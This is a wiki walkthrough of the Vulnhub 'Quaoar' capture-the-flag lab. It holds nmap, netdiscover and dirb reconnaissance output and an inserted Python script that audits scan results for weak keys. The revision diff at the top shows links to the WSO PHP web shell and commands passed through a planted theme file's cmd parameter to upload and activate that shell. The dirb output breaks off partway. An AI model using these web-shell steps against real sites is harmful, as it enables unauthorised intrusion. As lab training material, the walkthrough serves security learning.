Difference between revisions of "CTF Quaoar: Walkthrough"

From OnnoWiki
Line 906: Line 906:
 
  https://github.com/mIcHyAmRaNe/wso-webshell/blob/master/wso.php
 
  https://github.com/mIcHyAmRaNe/wso-webshell/blob/master/wso.php
 
  https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php
 
  https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php
 +
https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt
  
Copy paste ke /home/kali/wso.php
+
Copy paste ke /home/kali/Downloads/wso.txt
 
Rename
 
Rename
  
Line 914: Line 915:
 
Upload,
 
Upload,
  
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=curl%20--data%20"@/home/kali/Downloads/wso.txt"%20>%20wso.txt
+
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=curl%20--data%20"@/home/kali/Downloads/wso.txt"%20<%20wso.txt
 
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20wso.txt
 
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20wso.txt
 
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv wso.txt wso.php
 
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv wso.txt wso.php

Revision as of 12:40, 24 January 2023

Get Quaoar from Vulnhub

Check the Machine

Use

netdiscover -r 192.168.0.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                   
                                                                                                                                                                                                                                 
 21 Captured ARP Req/Rep packets, from 20 hosts.   Total size: 1260                                                                                                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 .....
 192.168.0.122   08:00:27:b2:18:3a      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 .....

Scan Quaoar

nmap -v -A 192.168.0.122
    
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 21:23 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Initiating ARP Ping Scan at 21:23
Scanning 192.168.0.122 [1 port]
Completed ARP Ping Scan at 21:23, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:23
Completed Parallel DNS resolution of 1 host. at 21:23, 0.00s elapsed
Initiating SYN Stealth Scan at 21:23
Scanning 192.168.0.122 [1000 ports]
Discovered open port 995/tcp on 192.168.0.122
Discovered open port 53/tcp on 192.168.0.122
Discovered open port 22/tcp on 192.168.0.122
Discovered open port 110/tcp on 192.168.0.122
Discovered open port 80/tcp on 192.168.0.122
Discovered open port 143/tcp on 192.168.0.122
Discovered open port 993/tcp on 192.168.0.122
Completed SYN Stealth Scan at 21:23, 0.11s elapsed (1000 total ports)
Initiating Service scan at 21:23
Scanning 7 services on 192.168.0.122
Completed Service scan at 21:26, 175.53s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.122
NSE: Script scanning 192.168.0.122.
Initiating NSE at 21:26
Completed NSE at 21:26, 12.15s elapsed
Initiating NSE at 21:26
Completed NSE at 21:26, 1.11s elapsed
Initiating NSE at 21:26
Completed NSE at 21:26, 0.00s elapsed
Nmap scan report for 192.168.0.122
Host is up (0.00055s latency).
Not shown: 993 closed tcp ports (reset)
PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain     ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http       Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
110/tcp open  pop3?
|_pop3-capabilities: RESP-CODES PIPELINING TOP SASL UIDL STLS CAPA
|_ssl-date: 2023-01-24T02:26:15+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2016-10-07T04:32:43
| Not valid after:  2026-10-07T04:32:43
| MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
143/tcp open  imap       Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2016-10-07T04:32:43
| Not valid after:  2026-10-07T04:32:43
| MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
|_ssl-date: 2023-01-24T02:26:15+00:00; -1s from scanner time.
993/tcp open  ssl/imap   Dovecot imapd
|_ssl-date: 2023-01-24T02:26:15+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2016-10-07T04:32:43
| Not valid after:  2026-10-07T04:32:43
| MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
995/tcp open  ssl/pop3s?
|_ssl-date: 2023-01-24T02:26:15+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2016-10-07T04:32:43
| Not valid after:  2026-10-07T04:32:43
| MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Uptime guess: 0.003 days (since Mon Jan 23 21:22:37 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.0.122

NSE: Script Post-scanning.
Initiating NSE at 21:26
Completed NSE at 21:26, 0.00s elapsed
Initiating NSE at 21:26
Completed NSE at 21:26, 0.00s elapsed
Initiating NSE at 21:26
Completed NSE at 21:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.52 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.366KB)

The port that looks most interesting to exploit is the web port, 80.
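
The same scan output is what a defender would read to find configuration weaknesses before an attacker does. The following Python is an added example, not part of the original walkthrough: it parses Nmap's normal output and flags the 1024-bit DSA host key, the SHA-1-signed certificate and the certificate whose Subject equals its Issuer, all visible in the scan above. The function names and the trimmed `SAMPLE` excerpt are constructed for illustration.

```python
import re

# Constructed sample: a trimmed excerpt of the Nmap output shown above.
SAMPLE = """\
PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
80/tcp  open  http       Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
993/tcp open  ssl/imap   Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC)
"""

# "22/tcp  open  ssh  OpenSSH 5.9p1 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "1024 d0:0a:...:e5 (DSA)" -> key size in bits, key algorithm
HOSTKEY_RE = re.compile(r"^(\d+)\s+[0-9a-f:]+\s+\((\w+)\)$")


def parse_services(text):
    """Group each port line with the NSE script lines ('|' / '|_') under it."""
    services, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "script": [],
            }
            services.append(current)
        elif line.startswith("|") and current is not None:
            # Drop the "|", "|_" and indentation that Nmap puts before script output.
            current["script"].append(line.lstrip("|_ ").rstrip())
        else:
            # Any other line (header, blank, MAC Address, ...) ends the port block.
            current = None
    return services


def audit(services):
    """Return (port, finding) tuples for weaknesses the scan itself reports."""
    findings = []
    for s in services:
        subject = issuer = None
        for entry in s["script"]:
            hk = HOSTKEY_RE.match(entry)
            if hk:
                bits, algo = int(hk.group(1)), hk.group(2)
                # DSA host keys and RSA keys below 2048 bits are considered weak.
                if algo == "DSA" or (algo == "RSA" and bits < 2048):
                    findings.append((s["port"], f"weak SSH host key: {bits}-bit {algo}"))
            elif entry.startswith("ssl-cert: Subject: "):
                subject = entry[len("ssl-cert: Subject: "):]
            elif entry.startswith("Issuer: "):
                issuer = entry[len("Issuer: "):]
            elif entry.startswith("Signature Algorithm: ") and "sha1" in entry.lower():
                findings.append((s["port"], "certificate signed with SHA-1"))
        if subject is not None and subject == issuer:
            findings.append((s["port"], "self-issued certificate (Subject equals Issuer)"))
    return findings


if __name__ == "__main__":
    svcs = parse_services(SAMPLE)
    for s in svcs:
        print(f'{s["port"]}/{s["proto"]} {s["service"]} {s["version"]}')
    for port, finding in audit(svcs):
        print(f"[!] port {port}: {finding}")
```
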

Use dirb

Run,

dirb http://192.168.0.122

The result

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jan 23 21:31:24 2023
URL_BASE: http://192.168.0.122/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt  
-----------------

GENERATED WORDS: 4612                                                           

---- Scanning URL: http://192.168.0.122/ ----
+ http://192.168.0.122/cgi-bin/ (CODE:403|SIZE:289)                                                                                                                                                                              
+ http://192.168.0.122/hacking (CODE:200|SIZE:616848)                                                                                                                                                                            
+ http://192.168.0.122/index (CODE:200|SIZE:100)                                                                                                                                                                                 
+ http://192.168.0.122/index.html (CODE:200|SIZE:100)                                                                                                                                                                            
+ http://192.168.0.122/LICENSE (CODE:200|SIZE:1672)                                                                                                                                                                              
+ http://192.168.0.122/robots (CODE:200|SIZE:271)                                                                                                                                                                                
+ http://192.168.0.122/robots.txt (CODE:200|SIZE:271)                                                                                                                                                                            
+ http://192.168.0.122/server-status (CODE:403|SIZE:294)                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/                                                                                                                                                                                      
==> DIRECTORY: http://192.168.0.122/wordpress/                                                                                                                                                                                   
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.0.122/upload/ ----
==> DIRECTORY: http://192.168.0.122/upload/account/                                                                                                                                                                              
==> DIRECTORY: http://192.168.0.122/upload/admins/                                                                                                                                                                               
+ http://192.168.0.122/upload/config (CODE:200|SIZE:0)                                                                                                                                                                           
==> DIRECTORY: http://192.168.0.122/upload/framework/                                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/include/                                                                                                                                                                              
+ http://192.168.0.122/upload/index (CODE:200|SIZE:3040)                                                                                                                                                                         
+ http://192.168.0.122/upload/index.php (CODE:200|SIZE:3040)                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/languages/                                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/media/                                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/upload/modules/                                                                                                                                                                              
==> DIRECTORY: http://192.168.0.122/upload/page/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/upload/search/                                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/upload/temp/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/upload/templates/                                                                                                                                                                            
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/ ----
==> DIRECTORY: http://192.168.0.122/wordpress/index/                                                                                                                                                                             
+ http://192.168.0.122/wordpress/index.php (CODE:301|SIZE:0)                                                                                                                                                                     
+ http://192.168.0.122/wordpress/license (CODE:200|SIZE:19930)                                                                                                                                                                   
+ http://192.168.0.122/wordpress/readme (CODE:200|SIZE:7195)                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/                                                                                                                                                                          
+ http://192.168.0.122/wordpress/wp-blog-header (CODE:200|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-config (CODE:200|SIZE:0)                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/                                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-cron (CODE:200|SIZE:0)                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/wordpress/wp-includes/                                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-links-opml (CODE:200|SIZE:217)                                                                                                                                                               
+ http://192.168.0.122/wordpress/wp-load (CODE:200|SIZE:0)                                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-login (CODE:200|SIZE:2530)                                                                                                                                                                   
+ http://192.168.0.122/wordpress/wp-mail (CODE:500|SIZE:3011)                                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-settings (CODE:500|SIZE:0)                                                                                                                                                                   
+ http://192.168.0.122/wordpress/wp-signup (CODE:302|SIZE:0)                                                                                                                                                                     
+ http://192.168.0.122/wordpress/wp-trackback (CODE:200|SIZE:135)                                                                                                                                                                
+ http://192.168.0.122/wordpress/xmlrpc (CODE:200|SIZE:42)                                                                                                                                                                       
+ http://192.168.0.122/wordpress/xmlrpc.php (CODE:200|SIZE:42)                                                                                                                                                                   
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/account/ ----
==> DIRECTORY: http://192.168.0.122/upload/account/css/                                                                                                                                                                          
+ http://192.168.0.122/upload/account/forgot (CODE:302|SIZE:0)                                                                                                                                                                   
+ http://192.168.0.122/upload/account/index (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/account/index.php (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/account/login (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/account/logout (CODE:302|SIZE:0)                                                                                                                                                                   
+ http://192.168.0.122/upload/account/preferences (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/account/signup (CODE:302|SIZE:0)                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/account/templates/                                                                                                                                                                    
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/ ----
==> DIRECTORY: http://192.168.0.122/upload/admins/access/                                                                                                                                                                        
==> DIRECTORY: http://192.168.0.122/upload/admins/addons/                                                                                                                                                                        
==> DIRECTORY: http://192.168.0.122/upload/admins/admintools/                                                                                                                                                                    
==> DIRECTORY: http://192.168.0.122/upload/admins/groups/                                                                                                                                                                        
+ http://192.168.0.122/upload/admins/index (CODE:302|SIZE:0)                                                                                                                                                                     
+ http://192.168.0.122/upload/admins/index.php (CODE:302|SIZE:0)                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/upload/admins/interface/                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/admins/languages/                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/admins/login/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/logout/                                                                                                                                                                        
==> DIRECTORY: http://192.168.0.122/upload/admins/media/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/modules/                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/upload/admins/pages/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/preferences/                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/admins/profiles/                                                                                                                                                                      
==> DIRECTORY: http://192.168.0.122/upload/admins/service/                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/upload/admins/settings/                                                                                                                                                                      
==> DIRECTORY: http://192.168.0.122/upload/admins/start/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/support/                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/upload/admins/templates/                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/admins/users/                                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/framework/ ----
==> DIRECTORY: http://192.168.0.122/upload/framework/functions/                                                                                                                                                                  
+ http://192.168.0.122/upload/framework/index (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.0.122/upload/framework/index.php (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/framework/summary (CODE:403|SIZE:88)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/ ----
+ http://192.168.0.122/upload/include/index (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/include/index.php (CODE:302|SIZE:0)                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/upload/include/yui/                                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/languages/ ----
+ http://192.168.0.122/upload/languages/index (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.0.122/upload/languages/index.php (CODE:302|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/media/ ----
+ http://192.168.0.122/upload/media/index (CODE:302|SIZE:0)                                                                                                                                                                      
+ http://192.168.0.122/upload/media/index.php (CODE:302|SIZE:0)                                                                                                                                                                  
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/ ----
+ http://192.168.0.122/upload/modules/admin (CODE:403|SIZE:79)                                                                                                                                                                   
+ http://192.168.0.122/upload/modules/admin.php (CODE:403|SIZE:79)                                                                                                                                                               
+ http://192.168.0.122/upload/modules/index (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/modules/index.php (CODE:302|SIZE:0)                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/upload/modules/news/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/                                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/page/ ----
+ http://192.168.0.122/upload/page/index (CODE:200|SIZE:0)                                                                                                                                                                       
+ http://192.168.0.122/upload/page/index.php (CODE:200|SIZE:0)                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/page/posts/                                                                                                                                                                           
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/search/ ----
+ http://192.168.0.122/upload/search/index (CODE:200|SIZE:3627)                                                                                                                                                                  
+ http://192.168.0.122/upload/search/index.php (CODE:200|SIZE:3627)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/temp/ ----
+ http://192.168.0.122/upload/temp/index (CODE:302|SIZE:0)                                                                                                                                                                       
+ http://192.168.0.122/upload/temp/index.php (CODE:302|SIZE:0)                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/temp/search/                                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/templates/ ----
==> DIRECTORY: http://192.168.0.122/upload/templates/blank/                                                                                                                                                                      
+ http://192.168.0.122/upload/templates/index (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.0.122/upload/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/index/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/ ----
+ http://192.168.0.122/wordpress/wp-admin/about (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/admin (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/comment (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/credits (CODE:302|SIZE:0)                                                                                                                                                              
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/css/                                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/customize (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/edit (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/export (CODE:302|SIZE:0)                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/images/                                                                                                                                                                   
+ http://192.168.0.122/wordpress/wp-admin/import (CODE:302|SIZE:0)                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/includes/                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/index (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/install (CODE:200|SIZE:1080)                                                                                                                                                           
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/js/                                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/link (CODE:302|SIZE:0)                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/maint/                                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-admin/media (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/menu (CODE:500|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/moderation (CODE:302|SIZE:0)                                                                                                                                                           
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/network/                                                                                                                                                                  
+ http://192.168.0.122/wordpress/wp-admin/options (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/plugins (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/post (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/profile (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/themes (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/wordpress/wp-admin/tools (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/update (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/wordpress/wp-admin/upgrade (CODE:200|SIZE:1173)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/upload (CODE:302|SIZE:0)                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/user/                                                                                                                                                                     
+ http://192.168.0.122/wordpress/wp-admin/users (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/widgets (CODE:302|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/ ----
+ http://192.168.0.122/wordpress/wp-content/index (CODE:200|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                                          
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/plugins/                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/themes/                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/upgrade/                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/uploads/                                                                                                                                                                
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/account/css/ ----
+ http://192.168.0.122/upload/account/css/frontend (CODE:200|SIZE:1931)                                                                                                                                                          
+ http://192.168.0.122/upload/account/css/index (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/account/css/index.php (CODE:302|SIZE:0)                                                                                                                                                            
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/account/templates/ ----
+ http://192.168.0.122/upload/account/templates/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/account/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/access/ ----
+ http://192.168.0.122/upload/admins/access/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/access/index.php (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/addons/ ----
+ http://192.168.0.122/upload/admins/addons/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/addons/index.php (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/admintools/ ----
+ http://192.168.0.122/upload/admins/admintools/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/admins/admintools/index.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/upload/admins/admintools/tool (CODE:302|SIZE:0)                                                                                                                                                           
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/groups/ ----
+ http://192.168.0.122/upload/admins/groups/add (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/admins/groups/groups (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/groups/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/groups/index.php (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/admins/groups/save (CODE:302|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/interface/ ----
+ http://192.168.0.122/upload/admins/interface/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/interface/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/upload/admins/interface/version (CODE:403|SIZE:90)                                                                                                                                                        
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/languages/ ----
+ http://192.168.0.122/upload/admins/languages/details (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/languages/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/languages/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/upload/admins/languages/install (CODE:500|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/languages/uninstall (CODE:302|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/login/ ----
==> DIRECTORY: http://192.168.0.122/upload/admins/login/forgot/                                                                                                                                                                  
+ http://192.168.0.122/upload/admins/login/index (CODE:200|SIZE:2929)                                                                                                                                                            
+ http://192.168.0.122/upload/admins/login/index.php (CODE:200|SIZE:2929)                                                                                                                                                        
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/logout/ ----
+ http://192.168.0.122/upload/admins/logout/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/logout/index.php (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/media/ ----
+ http://192.168.0.122/upload/admins/media/index (CODE:302|SIZE:0)                                                                                                                                                               
